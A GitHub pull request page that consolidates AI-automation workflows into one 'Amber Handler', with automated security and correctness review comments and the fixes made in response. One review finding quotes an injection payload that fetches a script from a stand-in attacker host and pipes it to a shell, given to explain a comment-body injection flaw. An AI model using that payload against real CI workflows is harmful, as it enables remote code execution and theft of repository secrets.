feat: consolidate Amber Handler — single workflow for all AI automation #1180
Gkrumbach07 merged 8 commits into main from
Conversation
Merge triage.yml and pr-fixer.yml into amber-issue-handler.yml as one unified Amber Handler with four jobs:
- handle-issue-label: amber:auto-fix label → create session to fix issue
- handle-comment: @amber on issue or PR → create session with user's text
- batch-pr-fixer: 30 min cron, manage all amber:managed PRs

Other changes:
- Unified labels: amber:managed, amber:triaged, amber:needs-human
- @amber comments pass user text directly, no injected instructions
- Removed amber:refactor and amber:test-coverage label triggers
- Delete pr-fixer.yml and triage.yml (consolidated)
- Per-job concurrency groups to prevent overlap

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
📝 Walkthrough
Replaces prior single-PR fixer and triage workflows with a single
sequenceDiagram
participant User
participant GitHub
participant AmberWF as "amber-issue-handler\n(workflow)"
participant Ambient as "ambient-code\nambient-action"
participant PR as "Pull Request"
User->>GitHub: add label `amber:auto-fix` / post comment `@amber` / (scheduled)
GitHub->>AmberWF: trigger event (issues/comment/schedule)
AmberWF->>Ambient: create/start session (include PR frontmatter if present)
Ambient-->>AmberWF: session id / phase / output
AmberWF->>GitHub: add labels/comments or update PR frontmatter
alt Batch run for `amber:managed` PRs
AmberWF->>GitHub: read PR frontmatter
AmberWF->>Ambient: start follow-up session if activity since `last_action`
Ambient-->>AmberWF: session result
AmberWF->>GitHub: update PR/frontmatter or add `amber:needs-human` on retry limit
end
Actionable comments posted: 4
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In @.github/workflows/amber-issue-handler.yml:
- Around line 162-179: The workflow is always creating a new Ambient session in
the "Create session" step (id: session) instead of reusing an existing ACP
session recorded in the PR frontmatter (key: acp:session_id) for amber:managed
PRs; update the job so that before calling ambient-code/ambient-action it
resolves the PR frontmatter (using the same logic that reads
steps.context.outputs.type and the PR frontmatter) and, if an acp:session_id
exists, pass that session id to the action (or skip creating a new session and
route the comment to that existing session) so the comment is forwarded to the
already-running agent; apply the same change to the second identical block
mentioned (the block around lines 244-265) so both places reuse acp:session_id
when present.
- Around line 100-109: The current workflow always runs the gh issue edit to add
"amber:triaged" before checking SESSION_NAME, so failed/no-session runs still
get triaged; change the logic so the label is only added when a session was
successfully created by moving the gh issue edit command into the existing
SESSION_NAME conditional (the block that checks if [ -n "$SESSION_NAME" ]) or by
adding an explicit check that SESSION_NAME is non-empty before running gh issue
edit; update references to SESSION_NAME and SESSION_PHASE accordingly so the
label and comment only run together when a session exists.
- Around line 68-71: Replace the mutable tag uses:
ambient-code/ambient-action@v0.0.3 with the action's immutable commit SHA for
each occurrence of the workflow step that references ambient-code/ambient-action
(the "Create session" step id: session and the other two uses entries later in
the file); update all three uses entries to the same full commit SHA string to
ensure reproducible runs and prevent upstream tag retargeting.
- Around line 54-60: The existing PR lookup may miss PRs because gh pr list
defaults to 30 and can return incomplete results, and the jq
test("source=.*#${NUMBER}") produces false positives when issue numbers are
substrings (e.g., `#12` matching `#123`); update the command in the step with id
existing to (1) increase the gh pr list result window (e.g., add --limit 1000)
so it scans all open PRs, and (2) tighten the jq filter used to set EXISTING by
replacing test("source=.*#${NUMBER}") with a regex that enforces a non-digit
boundary after the number such as test("source=.*#${NUMBER}([^0-9]|$)") (ensure
proper quoting/escaping of the shell variable NUMBER in the jq expression) so
only exact issue-number matches are detected.
.github/workflows/amber-issue-handler.yml
.github/workflows/pr-fixer.yml
.github/workflows/triage.yml
💤 Files with no reviewable changes (2)
- .github/workflows/triage.yml
- .github/workflows/pr-fixer.yml
```yaml
- name: Create session
  if: steps.existing.outputs.skip != 'true'
  id: session
  uses: ambient-code/ambient-action@v0.0.3
```
🧩 Analysis chain
🏁 Scripts executed (repository: ambient-code/platform):
```shell
cat -n .github/workflows/amber-issue-handler.yml | sed -n '60,75p'
cat -n .github/workflows/amber-issue-handler.yml | sed -n '160,170p'
cat -n .github/workflows/amber-issue-handler.yml | sed -n '200,215p'
# Search for all uses of ambient-action to ensure we catch all occurrences
rg "ambient-action" .github/workflows/amber-issue-handler.yml -n
```
Pin ambient-action to commit SHA at lines 71, 165, and 207.
Currently using mutable version tag @v0.0.3. Replace with full commit SHA for each uses: ambient-code/ambient-action reference to ensure reproducible runs and prevent upstream tag retargets.
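The existing-PR lookup flagged in the first review round, as an added Python example (my code, not the workflow's gh/jq step): the naive `source=.*#N` pattern beside the boundary-checked one, run over a constructed sample shaped like `gh pr list --json number,body,labels` output. It goes one step beyond the review by refusing a non-numeric issue number before it is interpolated into the regex. The `source=` frontmatter key and the `amber:managed` label come from the review text; the PR numbers and bodies are made up.

```python
import re

# Constructed sample shaped like `gh pr list --state open --json number,body,labels`
# (not real repository data): PR 201 tracks issue #123, PRs 202 and 203 track #12.
SAMPLE_PRS = [
    {"number": 201, "body": "---\nsource=ambient-code/platform#123\n---\nFix for #123",
     "labels": [{"name": "amber:managed"}]},
    {"number": 202, "body": "---\nsource=ambient-code/platform#12\n---\nFix for #12",
     "labels": [{"name": "amber:managed"}]},
    {"number": 203, "body": "---\nsource=ambient-code/platform#12\n---\nStale draft",
     "labels": []},
]


def naive_match(body, number):
    """The flagged pattern: `source=.*#12` also matches `#123`."""
    return re.search(rf"source=.*#{number}", body) is not None


def exact_match(body, number):
    """Boundary-checked: the number must not be followed by another digit."""
    if not re.fullmatch(r"\d+", str(number)):
        # Reject anything that is not a bare issue number before it reaches the regex.
        raise ValueError(f"issue number must be digits only: {number!r}")
    return re.search(rf"source=.*#{number}(?!\d)", body) is not None


def find_existing_pr(prs, number, label="amber:managed", matcher=exact_match):
    """Return the numbers of open PRs carrying `label` whose frontmatter tracks `number`."""
    return [
        pr["number"]
        for pr in prs
        if matcher(pr.get("body") or "", number)
        and any(lbl["name"] == label for lbl in pr.get("labels", []))
    ]
```

`(?!\d)` is the Python spelling of the `([^0-9]|$)` boundary suggested in the review. Paging is the other half of the fix: with the default window of 30 results a tracked PR can simply be absent from the list, so raise `--limit` (or page through results) before trusting an empty result.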
- Fix existing-PR regex: use boundary match to prevent #12 matching #123, add --limit 200 to gh pr list
- Only add amber:triaged label after session creation succeeds
- Add session reuse for @amber on PRs: read frontmatter session_id, pass as session-name to ambient-action (reuse if exists, create if not)
- Bump ambient-action to v0.0.4

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
… fix
- @amber alone (no text) → follow-up/fix prompt (assess CI, conflicts, reviews)
- @amber <text> → custom prompt (just context + user's words)
- amber:auto-fix label → fresh session prompt (investigate and create PR)
- Batch job rewritten as shell-driven Python instead of LLM orchestrator: parses frontmatter, checks changes, circuit breaker all in deterministic code, only calls ambient-action for actual fixes
- All paths check frontmatter for session reuse

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Actionable comments posted: 4
♻️ Duplicate comments (1)
.github/workflows/amber-issue-handler.yml (1)
71-71: ⚠️ Potential issue | 🟠 Major
Pin ambient-code/ambient-action to immutable SHAs. All three uses: entries are on mutable tags (@v0.0.4), which weakens reproducibility and supply-chain safety.
As per coding guidelines ".github/workflows/**/*.{yml,yaml}: - Pin action versions to SHA. Verify secrets are not exposed and permissions are scoped."
Also applies to: 182-182, 218-218
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In @.github/workflows/amber-issue-handler.yml at line 71, replace the mutable tag references to ambient-code/ambient-action@v0.0.4 with immutable commit SHAs for all occurrences (the uses: lines at the shown locations and the other two occurrences noted); locate the three uses entries that reference ambient-code/ambient-action and change each to use the corresponding full commit SHA (e.g., ambient-code/ambient-action@<full-commit-sha>) so the workflow is pinned to an immutable revision and update the workflow file accordingly.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In @.github/workflows/amber-issue-handler.yml:
- Around line 330-333: The circuit-breaker never advances because
fm["retry_count"] is never updated; modify the failure-handling path that
currently checks fm["retry_count"] (and calls gh("pr", "edit", ...
"--add-label", "amber:needs-human", "--remove-label", "amber:managed") and
gh("pr", "comment", ...)) to first increment fm["retry_count"] and update
fm["last_action"] in the PR frontmatter via gh("pr", "edit", ...) (or equivalent
frontmatter write) so the next workflow run sees the new retry_count; apply the
same change to the other identical failure blocks (the occurrences surrounding
the other gh("pr","edit") calls) so retries will deterministically trip after
reaching the threshold.
- Around line 150-152: The bash step currently injects github.event.comment.body
inline into COMMENT, which is vulnerable to shell injection; instead set an
environment variable (e.g., COMMENT_BODY) from github.event.comment.body in the
workflow step's env and reference $COMMENT_BODY inside the script; update the
uses of COMMENT and STRIPPED to read from COMMENT_BODY (e.g., assign
COMMENT="$COMMENT_BODY" then use safe expansion like printf '%s' "$COMMENT" |
sed 's/@amber//g' | tr -d '[:space:]') so untrusted text is not interpolated
into the shell command string.
- Around line 369-377: The workflow is invoking create_session.py via
os.path.join(os.environ.get("GITHUB_ACTION_PATH", "."), "create_session.py") but
create_session.py is missing; add the script into the repo (e.g.,
.github/scripts/create_session.py) and update the invocation to point to that
location (replace the fallback join with the explicit script path or build the
path from GITHUB_ACTION_PATH to ".github/scripts/create_session.py"); ensure the
script is executable and accepts the same CLI args (API_URL, API_TOKEN, PROJECT,
prompt_file, session_name, timeout) so the call in the workflow succeeds.
- Line 268: The pip install command `pip install --quiet requests>=2.31.0` is
being mis-parsed by the shell; update the workflow to quote the version
specifier (e.g., change the package arg to "requests>=2.31.0" or
'requests>=2.31.0') so the shell doesn't treat `>` as redirection; locate the
line containing that exact command in the workflow and wrap the package/version
in quotes.
Previously skipped amber:managed PRs with no frontmatter. Now creates a new session for them. Circuit breaker and change detection only apply when frontmatter exists. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
♻️ Duplicate comments (4)
.github/workflows/amber-issue-handler.yml (4)
268-268: ⚠️ Potential issue | 🟠 Major
Quote pip specifier — `>` is shell redirection. `requests>=2.31.0` unquoted causes the shell to interpret `>` as a redirect.
```diff
- pip install --quiet requests>=2.31.0
+ python3 -m pip install --quiet 'requests>=2.31.0'
```
🤖 Prompt for AI Agents
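Review bot: the `+` line changes two things at once: it quotes the specifier, which is the actual fix, and it swaps `pip` for `python3 -m pip`. The second change is worth keeping, since it guarantees the package is installed into the interpreter that later runs the heredoc script, but it should be stated in the comment rather than slipped in alongside the quoting fix.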
Verify each finding against the current code and only fix it if needed. In @.github/workflows/amber-issue-handler.yml at line 268, the pip install line uses an unquoted version specifier so the shell may treat the `>` as redirection; update the pip install invocation (the line containing `pip install --quiet requests>=2.31.0`) to quote or escape the package specifier (e.g., wrap requests>=2.31.0 in single or double quotes) so the `>` is passed to pip rather than the shell.
373-386: ⚠️ Potential issue | 🔴 Critical
create_session.py missing; GITHUB_ACTION_PATH unset in workflow runs.
GITHUB_ACTION_PATH is only populated inside composite actions. Here it falls back to `.`, but create_session.py doesn't exist anywhere in the repo. This batch job will fail. Options:
- Inline the session-creation logic using requests directly in the heredoc
- Add the script to .github/scripts/ and reference explicitly
- Use ambient-action via a sub-workflow or direct API call
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In @.github/workflows/amber-issue-handler.yml around lines 373 - 386, the workflow invokes create_session.py via sys.executable and GITHUB_ACTION_PATH but that script isn't in the repo and GITHUB_ACTION_PATH is unset, causing failures; fix by either (A) inlining the HTTP session-creation logic directly into the heredoc using requests (replace the subprocess.run(cmd, ...) call and build the API POST with API_URL, API_TOKEN, PROJECT, prompt_file, model, repos payload, handling timeout and session_id), or (B) add create_session.py under .github/scripts/ and update the command to call the explicit path (os.path.join('.', '.github', 'scripts', 'create_session.py')) so the GITHUB_ACTION_PATH fallback is not relied upon; update any references to cmd, subprocess.run, prompt_file and session_id accordingly and ensure the action has network permission to call the API.
333-338: ⚠️ Potential issue | 🟠 Major
Circuit breaker inert — retry_count never incremented.
Line 334 checks retry_count >= 3, but line 363 always writes retry_count=0 in the prompt. No code path increments this value on failure, so the breaker never trips. Need to either:
- Increment retry_count in frontmatter when the session fails/errors
- Or track state externally (labels, issue comments, etc.)
Also applies to: 363-363
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In @.github/workflows/amber-issue-handler.yml around lines 333 - 338, the circuit breaker never trips because fm["retry_count"] is always reset to 0 in the generated prompt and never incremented on failures; update the PR-processing failure paths to increment fm["retry_count"] (the frontmatter map `fm`) whenever a session fails/error occurs and persist that back to the PR (e.g., reuse the gh("pr","edit", ..., "--add-label"/"--remove-label" call pattern or update the PR body) so the existing check if fm["retry_count"] >= 3 will work, or alternatively implement an external state change (e.g., add/update a label or comment) in the same failure branch instead of resetting retry_count in the prompt generation.
150-151: ⚠️ Potential issue | 🔴 Critical
Shell injection via untrusted comment.body.
github.event.comment.body is interpolated directly into shell. A malicious comment like `'; curl attacker.com/pwn.sh | sh; echo '` breaks out.
Pass via env:
```diff
  - name: Resolve context
    id: context
    env:
      GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+     COMMENT_BODY: ${{ github.event.comment.body }}
    run: |
      NUMBER="${{ github.event.issue.number }}"
      echo "number=$NUMBER" >> $GITHUB_OUTPUT
      # Determine if `@amber` is alone (fix prompt) or has instruction text (custom prompt)
-     COMMENT='${{ github.event.comment.body }}'
+     COMMENT="$COMMENT_BODY"
      STRIPPED=$(echo "$COMMENT" | sed 's/@amber//g' | tr -d '[:space:]')
```
🤖 Prompt for AI Agents
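Review bot: the unchanged `STRIPPED=$(echo "$COMMENT" | sed 's/@amber//g' | tr -d '[:space:]')` line still feeds the body through `echo`, whose bash builtin treats a leading `-n` or `-e` as an option, so a comment beginning with `-e` is mangled before the emptiness check; use `printf '%s' "$COMMENT"` there. Also quote `"$GITHUB_OUTPUT"` in the `echo "number=$NUMBER" >> $GITHUB_OUTPUT` line for consistency; `github.event.issue.number` itself is numeric and safe to keep inline.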
Verify each finding against the current code and only fix it if needed. In @.github/workflows/amber-issue-handler.yml around lines 150 - 151, The current workflow injects github.event.comment.body directly into a single-quoted shell assignment (COMMENT='${{ github.event.comment.body }}') which allows a malicious comment to break out and execute commands; move the value into the GitHub Actions env context (set COMMENT: ${{ github.event.comment.body }} under env) and then operate on it safely in the shell using bash parameter expansion rather than command substitution or unquoted interpolation: reference COMMENT and compute STRIPPED using safe expansions (e.g., remove the literal "@amber" and all whitespace via bash parameter substitution like replacing patterns) so no shell-evaluated input can escape into commands.
- Batch job now uses requests library directly instead of shelling out to create_session.py (which isn't available in the GHA runner)
- handle-comment on issues now checks for existing amber:managed PR and reuses its session ID if found
- Added helper functions: get_session_phase, start_session_api, create_session_api for the batch Python script

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Actionable comments posted: 1
♻️ Duplicate comments (4)
.github/workflows/amber-issue-handler.yml (4)
71-71: ⚠️ Potential issue | 🟠 Major
Pin ambient-action to immutable commit SHAs. Using @v0.0.4 is mutable and weakens workflow supply-chain guarantees. Replace all three with the same full commit SHA.
```shell
#!/bin/bash
set -euo pipefail
# Expectation: this should return no matches after fix.
rg -n 'uses:\s*ambient-code/ambient-action@v0\.0\.4' .github/workflows/amber-issue-handler.yml
```
As per coding guidelines, ".github/workflows/**/*.{yml,yaml}: - Pin action versions to SHA. Verify secrets are not exposed and permissions are scoped."
Also applies to: 190-190, 226-226
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In @.github/workflows/amber-issue-handler.yml at line 71, The workflow currently pins ambient-code/ambient-action using the mutable tag "ambient-action@v0.0.4" in three places; replace each occurrence with the same immutable full commit SHA (the full 40-char commit hash) so all three uses point to that SHA, not the tag, and ensure you do not change other actions or expose secrets; after replacing verify no remaining matches with the provided rg command and confirm all three instances (the ones flagged in the comment) were updated to the identical commit SHA.
276-276: ⚠️ Potential issue | 🟠 Major
Quote the pip version specifier (currently shell-parsed). Line 276 uses `requests>=2.31.0` unquoted; `>` is handled by the shell, not as part of the package constraint.
Suggested fix
```diff
- pip install --quiet requests>=2.31.0
+ python3 -m pip install --quiet 'requests>=2.31.0'
```
```shell
#!/bin/bash
set -euo pipefail
# Expectation: no matches after fix.
rg -n 'pip install --quiet requests>=2\.31\.0|python3 -m pip install --quiet requests>=2\.31\.0' .github/workflows/amber-issue-handler.yml
```
Verify each finding against the current code and only fix it if needed. In @.github/workflows/amber-issue-handler.yml at line 276, The pip install command currently uses an unquoted version specifier ("pip install --quiet requests>=2.31.0") so the shell can interpret the ">"; fix it by quoting or escaping the package specifier (e.g., use "pip install --quiet 'requests>=2.31.0'" or equivalent) where the line contains pip install --quiet requests>=2.31.0 so the constraint is passed to pip rather than the shell.
143-143: ⚠️ Potential issue | 🔴 Critical
Avoid inline interpolation of untrusted comment text in shell. Line 150 injects github.event.comment.body directly into the script body; this is shell-injection prone.
Suggested fix
```diff
  - name: Resolve context
    id: context
    env:
      GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+     COMMENT_BODY: ${{ github.event.comment.body }}
    run: |
      NUMBER="${{ github.event.issue.number }}"
      echo "number=$NUMBER" >> $GITHUB_OUTPUT
      # Determine if `@amber` is alone (fix prompt) or has instruction text (custom prompt)
-     COMMENT='${{ github.event.comment.body }}'
-     STRIPPED=$(echo "$COMMENT" | sed 's/@amber//g' | tr -d '[:space:]')
+     COMMENT="$COMMENT_BODY"
+     STRIPPED=$(printf '%s' "$COMMENT" | sed 's/@amber//g' | tr -d '[:space:]')
```
Also applies to: 150-151
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In @.github/workflows/amber-issue-handler.yml at line 143, The workflow currently inlines github.event.comment.body directly into the run script (env:) which is shell-injection prone; instead set an environment variable (e.g., COMMENT_BODY) using the expression github.event.comment.body in the job/step env and then consume it safely in the run step (for example: printf '%s' "$COMMENT_BODY" or write it to a temp file with printf) so the shell never interprets untrusted content; update references to use COMMENT_BODY (or a temp file) rather than embedding github.event.comment.body directly in the script.
413-418: ⚠️ Potential issue | 🟠 Major
Circuit breaker reads retry_count but never advances it. Line 414 checks the threshold, but there is no frontmatter update path that increments retry_count; this makes tripping to amber:needs-human non-deterministic.
Also applies to: 447-447
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In @.github/workflows/amber-issue-handler.yml around lines 413 - 418, The circuit-breaker check reads fm["retry_count"] but never increments or persists it, so the retry threshold never advances; update the failure/attempt paths that handle an unresolved attempt to increment fm["retry_count"] (e.g., fm["retry_count"] += 1) and then persist that change back to the PR frontmatter using the existing frontmatter update routine (the same helper you use elsewhere to write fm back to the PR or call gh to edit the PR body), ensuring the increment happens before continuing; apply the same fix to the duplicate check location that also reads retry_count.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In @.github/workflows/amber-issue-handler.yml:
- Around line 39-40: The workflow uses two different concurrency group names for
the same issue which allows parallel runs to race; change both concurrency group
definitions to use the exact same shared key (for example replace both
occurrences with group: amber-issue-${{ github.event.issue.number }} or another
single consistent string like amber-issue-${{ github.event.issue.number
}}-shared) so label and comment paths share one concurrency lock and prevent
duplicate session creation.
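The batch job's circuit breaker and change detection, as an added Python example (my code, not the project's batch script): it parses the frontmatter block of a PR body, accepts `last_action` only if it has a strict ISO 8601 UTC shape before using it, compares against the PR's `updatedAt`, trips to needs-human at the retry threshold, and persists the increment, which is the fix the reviewer asked for. The key names, the sample body and the threshold of 3 are assumptions taken from the review discussion.

```python
import re
from datetime import datetime, timezone

MAX_RETRIES = 3                      # attempts before the PR is handed to a human (assumed)
TS_FMT = "%Y-%m-%dT%H:%M:%SZ"
FM_RE = re.compile(r"\A---\n(.*?)\n---\n", re.S)
# Only this exact UTC shape is accepted; anything else is treated as "never acted"
# and never reaches a jq filter or a shell command line.
TS_RE = re.compile(r"\A\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z\Z")

# Constructed PR body with assumed key names (not copied from the project).
SAMPLE_BODY = """---
source: ambient-code/platform#12
acp:session_id: sess-abc123
retry_count: 2
last_action: 2025-01-10T12:00:00Z
---
Automated fix for #12.
"""


def utc(value):
    """Parse a strict UTC timestamp into an aware datetime."""
    return datetime.strptime(value, TS_FMT).replace(tzinfo=timezone.utc)


def parse_frontmatter(body):
    """Return (fields, raw_block) for a leading --- block, or (None, None)."""
    m = FM_RE.match(body)
    if not m:
        return None, None
    fields = {}
    for line in m.group(1).splitlines():
        key, sep, value = line.partition(": ")   # keys such as acp:session_id contain ':'
        if sep:
            fields[key.strip()] = value.strip()
    return fields, m.group(0)


def render_frontmatter(fields):
    return "---\n" + "".join(f"{k}: {v}\n" for k, v in fields.items()) + "---\n"


def retry_count(fields):
    try:
        return int(fields.get("retry_count", "0"))
    except ValueError:
        return 0                                  # missing or tampered: start over


def last_action(fields):
    value = fields.get("last_action", "")
    if not TS_RE.match(value):
        return None                               # malformed: ignore rather than trust
    try:
        return utc(value)
    except ValueError:                            # right shape, impossible date
        return None


def decide(body, updated_at):
    """'needs-human' once the breaker trips, 'skip' if nothing changed since last_action,
    else 'fix' (start or continue a session)."""
    fields, _ = parse_frontmatter(body)
    if fields is None:
        return "fix"                              # no frontmatter: fresh session
    if retry_count(fields) >= MAX_RETRIES:
        return "needs-human"
    last = last_action(fields)
    if last is not None and updated_at <= last:
        return "skip"
    return "fix"


def record_attempt(body, now):
    """Bump retry_count and stamp last_action; return (new_body, changed)."""
    fields, raw = parse_frontmatter(body)
    if fields is None:
        return body, False
    fields["retry_count"] = str(retry_count(fields) + 1)
    fields["last_action"] = now.strftime(TS_FMT)
    new_body = body.replace(raw, render_frontmatter(fields), 1)
    return new_body, new_body != body
```

`decide` gates on `updatedAt` from `gh pr list`, which is one list call for the whole batch rather than a timeline call per PR; the strict timestamp regex is what keeps a hand-edited `last_action` out of any jq or shell invocation. `record_attempt` must run after every attempt, not only on failure, or a session that keeps "succeeding" without resolving the PR never trips the breaker.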
@amber alone on a PR → fix prompt (resolve CI, conflicts, reviews)
@amber alone on an issue → fresh prompt (investigate, implement, create PR)
Previously the fix prompt was used for both, which told the session to "assess merge conflicts" on issues that have no PR yet.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- Fix shell injection: pass comment body via env var, not inline interpolation
- Unify concurrency groups: all jobs use amber-$N to prevent races
- Quote pip specifier to prevent shell glob expansion
- Fix circuit breaker: batch script now increments retry_count in frontmatter after each fix attempt (was always reset to 0)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
- Replace per-PR timeline API calls with updatedAt from gh pr list (1 API call instead of N+1)
- Validate last_action format (ISO8601) to prevent jq/shell injection from untrusted frontmatter
- Move re import to top level

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Actionable comments posted: 1
🧹 Nitpick comments (1)
.github/workflows/amber-issue-handler.yml (1)
479-488: Frontmatter update relies on exact string match. If the frontmatter has been modified (extra whitespace, reordering), body.replace(old_fm, new_fm) will silently fail and skip the update. This is acceptable — the next cycle will retry. Consider logging when new_body == body for observability.
Optional: Log when frontmatter update is skipped
```diff
  new_body = body.replace(old_fm, new_fm)
  if new_body != body:
      gh("pr", "edit", str(number), "--repo", REPO, "--body", new_body)
      print(f"  Updated frontmatter: retry_count={new_count}, last_action={now}")
+ else:
+     print(f"  Warning: frontmatter replacement failed (string mismatch)")
```
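Review bot: the added `print(f"  Warning: frontmatter replacement failed (string mismatch)")` is an f-string with no placeholders; either drop the `f` prefix or, better, include `number` and the current retry count so the log says which PR was skipped and how far its breaker has advanced. Separately, `body.replace(old_fm, new_fm)` on the first line passes no count, so if the frontmatter text happens to appear twice in the body both copies are rewritten; pass `1`.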
Verify each finding against the current code and only fix it if needed. In @.github/workflows/amber-issue-handler.yml around lines 479 - 488, The frontmatter replacement uses an exact string match (old_fm) against body and silently skips when body.replace(old_fm, new_fm) yields no change; update the block around fm/old_fm/new_fm/body so that when new_body == body you emit a clear log (e.g., via print or the existing logger) indicating the frontmatter update was skipped and include context such as session_id and retry_count; keep the existing gh("pr","edit",...) path unchanged and only add the logging branch to improve observability.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In @.github/workflows/amber-issue-handler.yml:
- Line 71: The workflow currently references the mutable tag
"ambient-code/ambient-action@v0.0.4"; replace that tag with the specific commit
SHA "ambient-code/ambient-action@1204c23cd7f193bd056c11d13634b3c5a08d142a" so
the action is pinned to an immutable revision and the workflow becomes
reproducible.
Summary
Consolidate amber-issue-handler.yml, pr-fixer.yml, and triage.yml into a single amber-issue-handler.yml (Amber Handler).

Jobs
- handle-issue-label: amber:auto-fix label
- handle-comment: @amber on issue or PR
- batch-pr-fixer: amber:managed PRs

Changes
- @amber is now universal — works on both issues and PRs, passes the user's comment text directly with no injected instructions
- amber: namespace: amber:managed, amber:triaged, amber:needs-human
- Removed amber:refactor and amber:test-coverage label triggers
- Deleted pr-fixer.yml and triage.yml (consolidated)
- ambient-action@v0.0.3 with inactivity timeout

Test plan
- amber:auto-fix label to an issue: verify session created
- @amber fix the typo in README on an issue: verify session created with that text
- @amber on a PR: verify session created with PR context
- amber:managed PRs are picked up by batch cron

🤖 Generated with Claude Code